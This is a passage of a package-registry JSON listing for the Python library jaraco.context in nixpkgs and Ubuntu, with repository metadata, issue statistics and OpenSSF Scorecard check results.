kgs-23.05/packages/python310Packages.jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.jaraco-context/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":3335,"html_url":null,"role":null,"created_at":"2026-03-04T18:26:19.128Z","updated_at":"2026-03-04T18:26:19.128Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-23.05","url":"https://channels.nixos.org/nixos-23.05","ecosystem":"nixpkgs","default":false,"packages_count":101092,"maintainers_count":2622,"namespaces_count":0,"keywords_count":613,"github":"NixOS","metadata":{"funded_packages_count":2146},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.882Z","updated_at":"2026-08-24T05:04:28.515Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/namespaces"}},{"id":13468308,"name":"jaraco.context","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/jaraco/jaraco.context","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-09T18:33:35.089Z","latest_release_published_at":"2026-02-09T18:33:35.089Z","latest_release_number":"4.3.0-1","last_synced_at":"2026-03-09T19:06:44.180Z","created_at":"2026-02-09T18:33:34.842Z","updated_at":"2026-08-06T19:26:18.403Z","registry_url":"https://launchpad.net/ubuntu/+source/jaraco.context","install_command":"apt-get install jaraco.context","documentation_url":null,"metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-jaraco.context","standards_version":"4.6.2","maintainer":"Jeroen Ploemen \u003cjcfp@debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python, pybuild-plugin-pyproject, python3-all, python3-pytest \u003c!nocheck\u003e, python3-setuptools, python3-setuptools-scm","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.403Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/jaraco.context?arch=source\u0026distro=ubuntu-23.10\u0026repository_url=https://launchpad.net/ubuntu/mantic","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/jaraco.context/codemeta","maintainers":[],"registry":{"name":"ubuntu-23.10","url":"https://launchpad.net/ubuntu/mantic","ecosystem":"ubuntu","default":false,"packages_count":36642,"maintainers_count":0,"namespaces_count":4,"keywords_count":2213,"github":"ubuntu","metadata":{"codename":"mantic","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":1334},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:48.636Z","updated_at":"2026-08-24T05:06:10.948Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/namespaces"}},{"id":13076668,"name":"python311Packages.jaraco-context","ecosystem":"nixpkgs","description":"Python module for context management","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T17:34:12.071Z","latest_release_published_at":"2026-02-01T17:34:12.071Z","latest_release_number":"6.0.1","last_synced_at":"2026-04-09T20:00:20.409Z","created_at":"2026-02-01T17:34:09.522Z","updated_at":"2026-08-06T19:26:18.456Z","registry_url":"https://search.nixos.org/packages?channel=24.11\u0026query=python311Packages.jaraco-context","install_command":"nix-env -iA nixpkgs.python311Packages.jaraco-context","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.11/pkgs/development/python-modules/jaraco-context/default.nix#L36","metadata":{"nix_attribute":"python3.11-jaraco-context-6.0.1","position":"pkgs/development/python-modules/jaraco-context/default.nix:36","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"jaraco-context","upstream_purl":"pkg:pypi/jaraco-context"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.456Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python311Packages.jaraco-context?channel=24.11\u0026repository_url=https://channels.nixos.org/nixos-24.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.jaraco-context/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian 